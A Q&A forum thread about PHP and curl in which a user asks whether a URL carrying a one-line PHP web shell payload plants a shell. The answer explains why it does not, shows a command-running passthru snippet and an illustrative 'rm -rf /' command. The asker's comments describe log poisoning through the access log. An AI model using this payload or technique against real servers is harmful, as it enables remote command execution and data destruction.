# Uploading shell with URL?

Tags: php, curl

let's say I have an URL below

```
http://anyapp.com/"<?php passthru($_GET['cmd']);?>"
```

I send it through cuRL so, Is I successfully uploaded the shell with the cmd parameter?

Answer (score 0):

No.

A php function cannot be triggered via being a part of a url. 
What you are describing would be the same as you trying to visit `https://stackoverflow.com/"<?php passthru('rm -rf /');?>"` via your web browser.

All cURL does is execute a GET/POST call to the defined url, with or without a payload of data, just as your web browser does.

If you were to do this, you would rather have to call an url like:

```
https://example.com/passthru.php?cmd=yourcommand
```

And then in your passthru.php:

```
$command = filter_input(INPUT_POST, 'cmd');
passthru($command);
```

However, I would strongly advice not to do this, as it is bad practice and would be a big threat to your setup.

Comment: Hello, look, I send my URL via the curl and it stored in the log access file. Now when I open up the file with adding the parameter then I successfully exploited.

Comment: which echo back on the access log file.